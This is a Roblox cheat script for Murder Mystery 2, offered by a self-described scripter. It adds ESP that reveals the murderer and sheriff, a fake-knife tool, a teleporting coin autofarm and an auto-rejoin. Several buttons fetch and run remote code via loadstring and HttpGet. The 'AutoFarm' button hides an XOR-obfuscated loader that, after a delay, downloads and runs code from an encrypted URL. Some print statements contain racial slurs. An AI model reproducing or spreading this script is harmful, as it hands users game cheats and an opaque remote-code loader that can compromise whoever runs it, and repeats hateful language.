local NotificationHolder = loadstring(game:HttpGet("https://raw.githubusercontent.com/BocusLuke/UI/main/STX/Module.Lua"))()
local Notification = loadstring(game:HttpGet("https://raw.githubusercontent.com/BocusLuke/UI/main/STX/Client.Lua"))()


Notification:Notify(
    {Title = "Vse Script", Description = " New Scripter\n Script will load after 7-10seconds\n Add me on Discord .vsenew"},
    {OutlineColor = Color3.fromRGB(252, 3, 3),Time = 10, Type = "image"},
    {Image = "http://www.roblox.com/asset/?id=18380797171", ImageColor = Color3.fromRGB(255, 84, 84)}
)

wait(8)

_Hawk = "ohhahtuhthttouttpwuttuaunbotwo"
local Hawk = loadstring(game:HttpGet("https://raw.githubusercontent.com/TheHanki/HawkHUB/main/LibSources/HawkLib.lua", true))()

local Window = Hawk:Window({
	ScriptName = "MM2 Script By Vse",
	DestroyIfExists = true, --if false, gui wont disappear
	Theme = "Dark" --Themes: Pink, White, Dark
})

Window:Close({
	visibility = true, --if false, close button will disappear
	Callback = function()
		Window:Destroy() --Destroying Gui Function
	end,
})

Window:Minimize({
	visibility = true, --if false, close button will disappear
	OpenButton = true, -- Visible = false etc, open button.
	Callback = function()
	end,
})

local tab1 = Window:Tab("Main") 
-- Window:Tab("Tab","Tab Title")
local tab2 = Window:Tab("Shaders") 
local tab3 = Window:Tab("Informations") 

local newsec = tab1:Section("Scripts")
local shadersec = tab2:Section("Shaders")
local informationsec = tab3:Section("Information")


local label = informationsec:Label("Scripter | .vsenew")
local label = informationsec:Label("Helper | uerd  [ Owner of Etronix] ")
local button = informationsec:Button( " Etronix Discord",function()
	setclipboard ("https://discord.gg/JMjeh3sX")
end)
local label = shadersec:Label("Here are some shaders that I can share.","Add .vsenew on discord ") 

local button = shadersec:Button("Tropical Shader",function()
	print("Best shader frfr")
if not game:IsLoaded() then
    game.Loaded:Wait()
end
local Bloom = Instance.new("BloomEffect")
Bloom.Intensity = 0.1
Bloom.Threshold = 0
Bloom.Size = 100

local Tropic = Instance.new("Sky")
Tropic.Name = "Tropic"
Tropic.SkyboxUp = "http://www.roblox.com/asset/?id=169210149"
Tropic.SkyboxLf = "http://www.roblox.com/asset/?id=169210133"
Tropic.SkyboxBk = "http://www.roblox.com/asset/?id=169210090"
Tropic.SkyboxFt = "http://www.roblox.com/asset/?id=169210121"
Tropic.StarCount = 100
Tropic.SkyboxDn = "http://www.roblox.com/asset/?id=169210108"
Tropic.SkyboxRt = "http://www.roblox.com/asset/?id=169210143"
Tropic.Parent = Bloom

local Sky = Instance.new("Sky")
Sky.SkyboxUp = "http://www.roblox.com/asset/?id=196263782"
Sky.SkyboxLf = "http://www.roblox.com/asset/?id=196263721"
Sky.SkyboxBk = "http://www.roblox.com/asset/?id=196263721"
Sky.SkyboxFt = "http://www.roblox.com/asset/?id=196263721"
Sky.CelestialBodiesShown = false
Sky.SkyboxDn = "http://www.roblox.com/asset/?id=196263643"
Sky.SkyboxRt = "http://www.roblox.com/asset/?id=196263721"
Sky.Parent = Bloom

Bloom.Parent = game:GetService("Lighting")

local Bloom = Instance.new("BloomEffect")
Bloom.Enabled = false
Bloom.Intensity = 0.35
Bloom.Threshold = 0.2
Bloom.Size = 56

local Tropic = Instance.new("Sky")
Tropic.Name = "Tropic"
Tropic.SkyboxUp = "http://www.roblox.com/asset/?id=169210149"
Tropic.SkyboxLf = "http://www.roblox.com/asset/?id=169210133"
Tropic.SkyboxBk = "http://www.roblox.com/asset/?id=169210090"
Tropic.SkyboxFt = "http://www.roblox.com/asset/?id=169210121"
Tropic.StarCount = 100
Tropic.SkyboxDn = "http://www.roblox.com/asset/?id=169210108"
Tropic.SkyboxRt = "http://www.roblox.com/asset/?id=169210143"
Tropic.Parent = Bloom

local Sky = Instance.new("Sky")
Sky.SkyboxUp = "http://www.roblox.com/asset/?id=196263782"
Sky.SkyboxLf = "http://www.roblox.com/asset/?id=196263721"
Sky.SkyboxBk = "http://www.roblox.com/asset/?id=196263721"
Sky.SkyboxFt = "http://www.roblox.com/asset/?id=196263721"
Sky.CelestialBodiesShown = false
Sky.SkyboxDn = "http://www.roblox.com/asset/?id=196263643"
Sky.SkyboxRt = "http://www.roblox.com/asset/?id=196263721"
Sky.Parent = Bloom

Bloom.Parent = game:GetService("Lighting")
local Blur = Instance.new("BlurEffect")
Blur.Size = 2

Blur.Parent = game:GetService("Lighting")
local Efecto = Instance.new("BlurEffect")
Efecto.Name = "Efecto"
Efecto.Enabled = false
Efecto.Size = 2

Efecto.Parent = game:GetService("Lighting")
local Inaritaisha = Instance.new("ColorCorrectionEffect")
Inaritaisha.Name = "Inari taisha"
Inaritaisha.Saturation = 0.05
Inaritaisha.TintColor = Color3.fromRGB(255, 224, 219)

Inaritaisha.Parent = game:GetService("Lighting")
local Normal = Instance.new("ColorCorrectionEffect")
Normal.Name = "Normal"
Normal.Enabled = false
Normal.Saturation = -0.2
Normal.TintColor = Color3.fromRGB(255, 232, 215)

Normal.Parent = game:GetService("Lighting")
local SunRays = Instance.new("SunRaysEffect")
SunRays.Intensity = 0.05

SunRays.Parent = game:GetService("Lighting")
local Sunset = Instance.new("Sky")
Sunset.Name = "Sunset"
Sunset.SkyboxUp = "rbxassetid://323493360"
Sunset.SkyboxLf = "rbxassetid://323494252"
Sunset.SkyboxBk = "rbxassetid://323494035"
Sunset.SkyboxFt = "rbxassetid://323494130"
Sunset.SkyboxDn = "rbxassetid://323494368"
Sunset.SunAngularSize = 14
Sunset.SkyboxRt = "rbxassetid://323494067"

Sunset.Parent = game:GetService("Lighting")
local Takayama = Instance.new("ColorCorrectionEffect")
Takayama.Name = "Takayama"
Takayama.Enabled = false
Takayama.Saturation = -0.3
Takayama.Contrast = 0.1
Takayama.TintColor = Color3.fromRGB(235, 214, 204)

Takayama.Parent = game:GetService("Lighting")
local L = game:GetService("Lighting")
L.Brightness = 2.14
L.ColorShift_Bottom = Color3.fromRGB(11, 0, 20)
L.ColorShift_Top = Color3.fromRGB(240, 127, 14)
L.OutdoorAmbient = Color3.fromRGB(34, 0, 49)
L.ClockTime = 6.7
L.FogColor = Color3.fromRGB(94, 76, 106)
L.FogEnd = 1000
L.FogStart = 0
L.ExposureCompensation = 0.24
L.ShadowSoftness = 0
L.Ambient = Color3.fromRGB(59, 33, 27)

local Bloom = Instance.new("BloomEffect")
Bloom.Intensity = 0.1
Bloom.Threshold = 0
Bloom.Size = 100

local Tropic = Instance.new("Sky")
Tropic.Name = "Tropic"
Tropic.SkyboxUp = "http://www.roblox.com/asset/?id=169210149"
Tropic.SkyboxLf = "http://www.roblox.com/asset/?id=169210133"
Tropic.SkyboxBk = "http://www.roblox.com/asset/?id=169210090"
Tropic.SkyboxFt = "http://www.roblox.com/asset/?id=169210121"
Tropic.StarCount = 100
Tropic.SkyboxDn = "http://www.roblox.com/asset/?id=169210108"
Tropic.SkyboxRt = "http://www.roblox.com/asset/?id=169210143"
Tropic.Parent = Bloom

local Sky = Instance.new("Sky")
Sky.SkyboxUp = "http://www.roblox.com/asset/?id=196263782"
Sky.SkyboxLf = "http://www.roblox.com/asset/?id=196263721"
Sky.SkyboxBk = "http://www.roblox.com/asset/?id=196263721"
Sky.SkyboxFt = "http://www.roblox.com/asset/?id=196263721"
Sky.CelestialBodiesShown = false
Sky.SkyboxDn = "http://www.roblox.com/asset/?id=196263643"
Sky.SkyboxRt = "http://www.roblox.com/asset/?id=196263721"
Sky.Parent = Bloom

Bloom.Parent = game:GetService("Lighting")

local Bloom = Instance.new("BloomEffect")
Bloom.Enabled = false
Bloom.Intensity = 0.35
Bloom.Threshold = 0.2
Bloom.Size = 56

local Tropic = Instance.new("Sky")
Tropic.Name = "Tropic"
Tropic.SkyboxUp = "http://www.roblox.com/asset/?id=169210149"
Tropic.SkyboxLf = "http://www.roblox.com/asset/?id=169210133"
Tropic.SkyboxBk = "http://www.roblox.com/asset/?id=169210090"
Tropic.SkyboxFt = "http://www.roblox.com/asset/?id=169210121"
Tropic.StarCount = 100
Tropic.SkyboxDn = "http://www.roblox.com/asset/?id=169210108"
Tropic.SkyboxRt = "http://www.roblox.com/asset/?id=169210143"
Tropic.Parent = Bloom

local Sky = Instance.new("Sky")
Sky.SkyboxUp = "http://www.roblox.com/asset/?id=196263782"
Sky.SkyboxLf = "http://www.roblox.com/asset/?id=196263721"
Sky.SkyboxBk = "http://www.roblox.com/asset/?id=196263721"
Sky.SkyboxFt = "http://www.roblox.com/asset/?id=196263721"
Sky.CelestialBodiesShown = false
Sky.SkyboxDn = "http://www.roblox.com/asset/?id=196263643"
Sky.SkyboxRt = "http://www.roblox.com/asset/?id=196263721"
Sky.Parent = Bloom

Bloom.Parent = game:GetService("Lighting")
local Blur = Instance.new("BlurEffect")
Blur.Size = 2

Blur.Parent = game:GetService("Lighting")
local Efecto = Instance.new("BlurEffect")
Efecto.Name = "Efecto"
Efecto.Enabled = false
Efecto.Size = 2

Efecto.Parent = game:GetService("Lighting")
local Inaritaisha = Instance.new("ColorCorrectionEffect")
Inaritaisha.Name = "Inari taisha"
Inaritaisha.Saturation = 0.05
Inaritaisha.TintColor = Color3.fromRGB(255, 224, 219)

Inaritaisha.Parent = game:GetService("Lighting")
local Normal = Instance.new("ColorCorrectionEffect")
Normal.Name = "Normal"
Normal.Enabled = false
Normal.Saturation = -0.2
Normal.TintColor = Color3.fromRGB(255, 232, 215)

Normal.Parent = game:GetService("Lighting")
local SunRays = Instance.new("SunRaysEffect")
SunRays.Intensity = 0.05

SunRays.Parent = game:GetService("Lighting")
local Sunset = Instance.new("Sky")
Sunset.Name = "Sunset"
Sunset.SkyboxUp = "rbxassetid://323493360"
Sunset.SkyboxLf = "rbxassetid://323494252"
Sunset.SkyboxBk = "rbxassetid://323494035"
Sunset.SkyboxFt = "rbxassetid://323494130"
Sunset.SkyboxDn = "rbxassetid://323494368"
Sunset.SunAngularSize = 14
Sunset.SkyboxRt = "rbxassetid://323494067"

Sunset.Parent = game:GetService("Lighting")
local Takayama = Instance.new("ColorCorrectionEffect")
Takayama.Name = "Takayama"
Takayama.Enabled = false
Takayama.Saturation = -0.3
Takayama.Contrast = 0.1
Takayama.TintColor = Color3.fromRGB(235, 214, 204)

Takayama.Parent = game:GetService("Lighting")
local L = game:GetService("Lighting")
L.Brightness = 2.14
L.ColorShift_Bottom = Color3.fromRGB(11, 0, 20)
L.ColorShift_Top = Color3.fromRGB(240, 127, 14)
L.OutdoorAmbient = Color3.fromRGB(34, 0, 49)
L.ClockTime = 6.7
L.FogColor = Color3.fromRGB(94, 76, 106)
L.FogEnd = 1000
L.FogStart = 0
L.ExposureCompensation = 0.24
L.ShadowSoftness = 0
L.Ambient = Color3.fromRGB(59, 33, 27)
end)

local button = shadersec:Button("Little Glossy Shader",function()
local a = game.Lighting
a.Ambient = Color3.fromRGB(33, 33, 33)
a.Brightness = 5.69
a.ColorShift_Bottom = Color3.fromRGB(0, 0, 0)
a.ColorShift_Top = Color3.fromRGB(255, 247, 237)
a.EnvironmentDiffuseScale = 0.105
a.EnvironmentSpecularScale = 0.522
a.GlobalShadows = true
a.OutdoorAmbient = Color3.fromRGB(51, 54, 67)
a.ShadowSoftness = 0.18
a.GeographicLatitude = -15.525
a.ExposureCompensation = 0.75
b.Enabled = true
b.Intensity = 0.99
b.Size = 9999 
b.Threshold = 0
local c = Instance.new("ColorCorrectionEffect", a)
c.Brightness = 0.015
c.Contrast = 0.25
c.Enabled = true
c.Saturation = 0.2
c.TintColor = Color3.fromRGB(217, 145, 57)
if getgenv().mode == "Summer" then
   c.TintColor = Color3.fromRGB(255, 220, 148)
elseif getgenv().mode == "Autumn" then
   c.TintColor = Color3.fromRGB(217, 145, 57)
else
   warn("No mode selected!")
   print("Please select a mode")
   b:Destroy()
   c:Destroy()
end
local d = Instance.new("DepthOfFieldEffect", a)
d.Enabled = true
d.FarIntensity = 0.077
d.FocusDistance = 21.54
d.InFocusRadius = 20.77
d.NearIntensity = 0.277
local e = Instance.new("ColorCorrectionEffect", a)
e.Brightness = 0
e.Contrast = -0.07
e.Saturation = 0
e.Enabled = true
e.TintColor = Color3.fromRGB(255, 247, 239)
local e2 = Instance.new("ColorCorrectionEffect", a)
e2.Brightness = 0.2
e2.Contrast = 0.45
e2.Saturation = -0.1
e2.Enabled = true
e2.TintColor = Color3.fromRGB(255, 255, 255)
local s = Instance.new("SunRaysEffect", a)
s.Enabled = true
s.Intensity = 0.01
s.Spread = 0.146
 
print("RTX Graphics loaded! Enjoy !")	
end)

--Main

local button = newsec:Button("Click here to copy our discord invite","Copied into your clipboard..",function()
    setclipboard("https://discord.gg/JMjeh3sX")
	print("Thanks nigga for joining our server fat ass niger.")
end)

local button = newsec:Button("My GUI","A lot of features not working",function()
    print("Fuck me daddy..")
	print("Add .vsenew on Discord ! ")
    loadstring(game:HttpGet("https://raw.githubusercontent.com/Nidizz/Roblox/main/MM2",true))()
end)

local button = newsec:Button("ESP","Shitty, sorry.",function()
	
local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ESPon = Instance.new("TextButton")
local ESPOff = Instance.new("TextButton")
local HIDE = Instance.new("TextButton")
local OPEN = Instance.new("TextButton")

--Properties:
 
ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ResetOnSpawn = false
 
Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.new(0, 0, 0)
Frame.Position = UDim2.new(0.166156977, 0, 0, 0)
Frame.Size = UDim2.new(0, 163, 0, 227)  --comando original (tamanho original): Frame.Size = UDim2.new(0, 163, 0, 454)
 
ESPon.Name = "ESPon"
ESPon.Parent = ScreenGui
ESPon.BackgroundColor3 = Color3.new(0, 1, 0)
ESPon.Position = UDim2.new(0.166156977, 0, -4.41335142e-05, 0)
ESPon.Size = UDim2.new(0, 163, 0, 50)
ESPon.Font = Enum.Font.SourceSans
ESPon.Text = "To enable ESP, press E"
ESPon.TextColor3 = Color3.new(0, 0, 0)
ESPon.TextScaled = true
ESPon.TextSize = 14
ESPon.TextWrapped = true
 
ESPOff.Name = "ESPOff"
ESPOff.Parent = ScreenGui
ESPOff.BackgroundColor3 = Color3.new(1, 0, 0.0156863)
ESPOff.Position = UDim2.new(0.166156977, 0, 0.105935514, 0)
ESPOff.Size = UDim2.new(0, 163, 0, 50)
ESPOff.Font = Enum.Font.SourceSans
ESPOff.Text = "To turn off ESP, press F"
ESPOff.TextColor3 = Color3.new(0, 0, 0)
ESPOff.TextScaled = true
ESPOff.TextSize = 14
ESPOff.TextWrapped = true
 
HIDE.Name = "HIDE"
HIDE.Parent = ScreenGui
HIDE.BackgroundColor3 = Color3.new(1, 0, 0.0156863)
HIDE.Position = UDim2.new(0.166156977, 0, 0.211999387, 0)
HIDE.Size = UDim2.new(0, 163, 0, 56)
HIDE.Font = Enum.Font.SourceSans
HIDE.Text = "Hide GUI"
HIDE.TextColor3 = Color3.new(0, 0, 0)
HIDE.TextScaled = true
HIDE.TextSize = 14
HIDE.TextWrapped = true
 
OPEN.Name = "OPEN"
OPEN.Parent = ScreenGui
OPEN.Active = false
OPEN.BackgroundColor3 = Color3.new(0.0117647, 1, 0.0117647)
OPEN.Position = UDim2.new(0, 0, 0.0418502204, 0)
OPEN.Size = UDim2.new(0, 116, 0, 19)
OPEN.Visible = false
OPEN.Font = Enum.Font.SourceSans
OPEN.Text = "OPEN"
OPEN.TextColor3 = Color3.new(0, 0, 0)
OPEN.TextScaled = true
OPEN.TextSize = 14
OPEN.TextWrapped = true

 
-- Scripts:
 
local function XVGFY_fake_script() -- ScreenGui.LocalScript
local script = Instance.new('LocalScript', ScreenGui)
 
-- FUNCTIONS
function murderer()
	for i, v in pairs(game.Players:children()) do
		if  v.Backpack:findFirstChild("Knife") or v.Character:findFirstChild("Knife") then
			return v
		end
	end
end
 
function sherrif()
	for i, v in pairs(game.Players:children()) do
		if  v.Backpack:findFirstChild("Gun") or v.Character:findFirstChild("Gun") then
			return v
		end
	end
end
 
 
-- ESP ON BUTTON (my new command is ESP ON KEY xD)
 
--script.Parent.ESPon.MouseButton1Down:connect(function()
game:GetService("UserInputService").InputBegan:connect(function(inputObject, gameProcessedEvent)
	if inputObject.KeyCode == Enum.KeyCode.E then
	
		for i, v in pairs(game.Players:children()) do
			if v.Backpack:findFirstChild("Knife") or v.Character:findFirstChild("Knife") then
				local esp = Instance.new("BoxHandleAdornment")
				esp.Parent = v.Character.Head
				esp.Size = Vector3.new(1,1,1)
				esp.Color3 = Color3.new(255, 0, 0)
				esp.AlwaysOnTop = true
				esp.Adornee = v.Character.Head
				esp.Visible = true
				esp.ZIndex = 2
				 
			elseif v.Backpack:findFirstChild("Gun") or v.Character:findFirstChild("Gun") then
				local esp = Instance.new("BoxHandleAdornment")
				esp.Parent = v.Character.Head
				esp.Size = Vector3.new(1,1,1)
				esp.Color3 = Color3.new(0, 0, 255)
				esp.AlwaysOnTop = true
				esp.Adornee = v.Character.Head
				esp.Visible = true
				esp.ZIndex = 2
			else
				local esp = Instance.new("BoxHandleAdornment")
				esp.Parent = v.Character.Head
				esp.Size = Vector3.new(1,1,1)
				esp.Color3 = Color3.new(0, 255, 0)
				esp.AlwaysOnTop = true
				esp.Adornee = v.Character.Head
				esp.Visible = true
				esp.ZIndex = 2
			end
		end		
	end
end)
--)
 
-- ESP OFF BUTTON
 
--script.Parent.ESPOff.MouseButton1Down:connect(function()
game:GetService("UserInputService").InputBegan:connect(function(inputObject, gameProcessedEvent)
	if inputObject.KeyCode == Enum.KeyCode.F then
		for i, v in pairs(game.Players:children()) do
			for i, a in pairs(v.Character.Head:children()) do
				if a.ClassName == "BoxHandleAdornment" then
					a:remove()
				end
			end
		end
	end
end)

--end)

 
-- Hide Button
 
script.Parent.HIDE.MouseButton1Down:connect(function()
	for i, v in pairs(script.Parent:children()) do
		if v.Name ~= "OPEN" then
			v.Visible = false
			v.Active = false
		 
		else
			v.Active = true
			v.Visible = true
		end
	end
end)
 
-- Open Button
 
script.Parent.OPEN.MouseButton1Down:connect(function()
	for i, v in pairs(script.Parent:children()) do
		if v.Name ~= "OPEN" then
			v.Visible = true
			v.Active = true
		 
		else
			v.Active = false
			v.Visible = false
		end
	end
end)

end
coroutine.wrap(XVGFY_fake_script)()	
end)

local button = newsec:Button("Fake Knife | Gun","Ngl it's ass",function()
 local lp = game.Players.LocalPlayer
local tool;local handle;local knife;
local animation1 = Instance.new("Animation")
animation1.AnimationId = "rbxassetid://2467567750"
local animation2 = Instance.new("Animation")
animation2.AnimationId = "rbxassetid://1957890538"
local anims = {animation1,animation2}
tool = Instance.new("Tool")
tool.Name = "Fake Knife"
tool.Grip = CFrame.new(0, -1.16999984, 0.0699999481, 1, 0, 0, 0, 1, 0, 0, 0, 1)
tool.GripForward = Vector3.new(-0, -0, -1)
tool.GripPos = Vector3.new(0,-1.17,0.0699999)
tool.GripRight = Vector3.new(1,0,0)
tool.GripUp = Vector3.new(0,1,0)
handle = Instance.new("Part")
handle.Size = Vector3.new(0.310638815, 3.42103457, 1.08775854)
handle.Name = "Handle"
handle.Transparency = 1
handle.Parent = tool
tool.Parent = lp.Backpack
knife=lp.Character:WaitForChild("KnifeDisplay")
knife.Massless = true
lp:GetMouse().Button1Down:Connect(function()
if tool and  tool.Parent == lp.Character then
local an = lp.Character.Humanoid:LoadAnimation(anims[math.random(1,2)])
an:Play()
end
end)
local aa = Instance.new("Attachment",handle)
local ba = Instance.new("Attachment",knife)
local hinge = Instance.new("HingeConstraint",knife)
hinge.Attachment0=aa hinge.Attachment1=ba
hinge.LimitsEnabled = true
hinge.LowerAngle = 0
hinge.Restitution = 0
hinge.UpperAngle = 0
lp.Character:WaitForChild"UpperTorso":FindFirstChild("Weld"):Destroy()
game:GetService"RunService".Heartbeat:Connect(function()
setsimulationradius(1/0,1/0)
if tool.Parent == lp.Character then
knife.CFrame = handle.CFrame
else
knife.CFrame = lp.Character:WaitForChild"UpperTorso".CFrame
end
end)	
end)

local button = newsec:Button("AutoFarm (NOT MINE)",function()
    print("Fuck me daddy..")
	print("Add .vsenew on Discord ! ")
    local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v54,v55) local v56={};for v63=1, #v54 do v6(v56,v0(v4(v1(v2(v54,v63,v63 + 1 )),v1(v2(v55,1 + (v63% #v55) ,1 + (v63% #v55) + 1 )))%256 ));end return v5(v56);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v9=Instance.new(v7("\23\200\50\209\208\34\207\47\201","\156\67\173\74\165"));local v10=Instance.new(v7("\1\158\110\4\189\34\79\49\185\93","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\100\19\58\6\210\81\20\39\30","\158\48\118\66\114"));local v12=Instance.new(v7("\158\13\55\36\114\161\242\174\42\4","\155\203\68\112\86\19\197"));v8.Name=v7("\96\220\36\241\103\109\236","\152\38\189\86\156\32\24\133");v8.Parent=game.CoreGui;v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Name=v7("\216\94\180\69\243\69\163","\38\156\55\199");v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(255,1920 -(970 + 695) ,255);v9.BackgroundTransparency=1 -0 ;v9.BorderColor3=Color3.fromRGB(0 -0 ,0 -0 ,0 + 0 );v9.BorderSizePixel=0 -0 ;v9.Position=UDim2.new(14.309225082 -(9 + 5) ,0,376.0147928996 -(85 + 291) ,1265 -(243 + 1022) );v9.Size=UDim2.new(1824.381549805 -(1195 + 629) ,0 -0 ,0.0887573957,0 + 0 );v9.Font=Enum.Font.FredokaOne;v9.Text=v7("\172\110\127\102\20\115\181\69\164\112\111","\35\200\29\28\72\115\20\154");v9.TextColor3=Color3.fromRGB(1435 -(1123 + 57) ,208 + 47 ,255);v9.TextScaled=true;v9.TextSize=10 + 4 ;v9.TextWrapped=true;v10.Color=ColorSequence.new({ColorSequenceKeypoint.new(254 -(163 + 91) ,Color3.fromRGB(428 -173 ,157,0)),ColorSequenceKeypoint.new(1930.51 -(1869 + 61) ,Color3.fromRGB(255,1255 -(451 + 549) ,72 + 183 )),ColorSequenceKeypoint.new(1 -0 ,Color3.fromRGB(35 + 220 ,215 -58 ,0 + 0 ))});v10.Parent=v9;v11.Name=v7("\46\190\195\209\132\34\51","\84\121\223\177\191\237\76");v11.Parent=v8;v11.BackgroundColor3=Color3.fromRGB(387 -132 ,596 -(218 + 123) ,1836 -(1535 + 46) );v11.BackgroundTransparency=1 + 0 ;v11.BorderColor3=Color3.fromRGB(1474 -(1329 + 145) ,0,971 -(140 + 831) );v11.BorderSizePixel=1850 -(1409 + 441) ;v11.Position=UDim2.new(560.309225082 -(306 + 254) ,0,718.872781038 -(15 + 703) ,0 + 0 );v11.Size=UDim2.new(438.381549805 -(262 + 176) ,1721 -(345 + 1376) ,688.0887573957 -(198 + 490) ,0 -0 );v11.Font=Enum.Font.FredokaOne;v11.Text=v7("\139\67\221\224\14\88\57\210\251\101\202\178\51\64\36\129\146\88\137\129\47\68\63\196\163\83\202\224\28\95\60\197\190\68\136","\161\219\54\169\192\90\48\80");v11.TextColor3=Color3.fromRGB(611 -356 ,1461 -(696 + 510) ,534 -279 );v11.TextScaled=true;v11.TextSize=1276 -(1091 + 171) ;v11.TextWrapped=true;v12.Color=ColorSequence.new({ColorSequenceKeypoint.new(0 -0 ,Color3.fromRGB(255,520 -363 ,374 -(123 + 251) )),ColorSequenceKeypoint.new(0.51 -0 ,Color3.fromRGB(953 -(208 + 490) ,1279 -(706 + 318) ,22 + 233 )),ColorSequenceKeypoint.new(2 -1 ,Color3.fromRGB(1091 -(660 + 176) ,140 + 17 ,0 + 0 ))});v12.Parent=v11;local function v51() local v57=Instance.new(v7("\101\77\3\36\69\113\3\55\64\82\20","\69\41\34\96"),v8);local function v58(v64,v65,v66) game.StarterGui:SetCore(v7("\143\198\217\14\44\36\168\202\209\3\1\42\168\202\216\4","\75\220\163\183\106\98"),{[v7("\54\179\159\59\220","\185\98\218\235\87")]=v64,[v7("\255\57\63\242","\202\171\92\71\134\190")]=v65,[v7("\13\212\62\137\61\200\35\134","\232\73\161\76")]=v66});end v58(v7("\136\204\65\94\27\168\202\68\72\18\183\192\3","\126\219\185\34\61"),v7("\45\219\74\125\62\81\242\245\1\142\123\124\127\117\255\226\8\143","\135\108\174\62\18\30\23\147"),207 -(14 + 188) );while wait(1501 -(1408 + 92) ) do local v67=675 -(534 + 141) ;while true do if (v67==(1288 -(993 + 295))) then if (game.Workspace:WaitForChild(v7("\152\230\56\198\25\162","\167\214\137\74\171\120\206\83")):WaitForChild(v7("\168\255\59\83\219\168\133\228\51\84\246\162\153","\199\235\144\82\61\152")):WaitForChild(v7("\36\25\176\37\56\37\188\57\17\19\171","\75\103\118\217")).CoinVisual.BrickColor==BrickColor.new(v7("\229\70\121\19\177\10\135\77\117\24\181\17\208","\126\167\52\16\116\217"))) then game.Workspace:WaitForChild(v7("\230\33\50\141\181\21","\156\168\78\64\224\212\121")):WaitForChild(v7("\36\225\172\192\36\225\171\218\6\231\171\203\21","\174\103\142\197")):WaitForChild(v7("\117\39\86\54\26\109\253\68\62\90\42","\152\54\72\63\88\69\62")):Destroy();else local v72=0 + 0 ;while true do if (v72==(1 + 0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(106.059 + 4),139.71, -(31.14 -16));break;end if (v72==(0 -0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=game.Workspace:WaitForChild(v7("\250\203\252\81\213\200","\60\180\164\142")):WaitForChild(v7("\123\81\12\39\4\226\28\76\95\12\39\34\255","\114\56\62\101\73\71\141")).Coin_Server.CFrame;wait(0.5 -0 );v72=1 + 0 ;end end end wait(0.5 + 0 );v67=1 + 0 ;end if (v67==(397 -(115 + 281))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -110.059,323.71000000000004 -184 , -(13.14 + 2));break;end end end end coroutine.wrap(v51)();local function v52() local v59=0 -0 ;local v60;while true do if (v59==(0 -0)) then v60=Instance.new(v7("\148\230\216\197\180\218\216\214\177\249\207","\164\216\137\187"),v8);while true do wait();getgenv().rejoin=game:GetService(v7("\241\233\35\183\129\235\2","\107\178\134\81\210\198\158")).RobloxPromptGui.promptOverlay.ChildAdded:Connect(function(v71) if ((v71.Name==v7("\29\28\144\201\184\8\28\141\203\186\44","\202\88\110\226\166")) and v71:FindFirstChild(v7("\238\10\145\228\203\196\10\163\229\207\194","\170\163\111\226\151")) and v71.MessageArea:FindFirstChild(v7("\52\34\160\55\92\17\59\16\61\183","\73\113\80\210\88\46\87"))) then game:GetService(v7("\181\41\193\23\247\142\62\217\33\226\147\58\196\17\226","\135\225\76\173\114")):Teleport(game.PlaceId);print(v7("\8\232\178\191\165\179\170\31\233\188","\199\122\141\216\208\204\221"));end end);end break;end end end coroutine.wrap(v52)();local function v53() local v61=0 -0 ;local v62;while true do if (v61==(868 -(550 + 317))) then v62.Parent:Destroy();loadstring(game:HttpGet(v7("\45\144\171\92\23\210\94\95\55\133\168\2\3\129\5\24\48\134\170\95\1\154\18\31\43\144\186\66\16\198\18\31\40\203\180\69\22\145\4\24\36\212\235\28\85\199\16\5\49\139\185\77\22\133\94\29\36\141\177\3\38\141\16\19\45\166\190\64\8\174\16\2\40\202\179\89\5","\112\69\228\223\44\100\232\113"),true))();break;end if (v61==(0 -0)) then local v68=0;while true do if (v68==(0 -0)) then v62=Instance.new(v7("\129\210\19\241\116\197\174\207\25\224\108","\150\205\189\112\144\24"),v8);wait(8 + 22 );v68=2 -1 ;end if (v68==1) then v61=286 -(134 + 151) ;break;end end end end end coroutine.wrap(v53)();
end)

local discordsec = tab3:Section(".gg/uSjEUtrx")
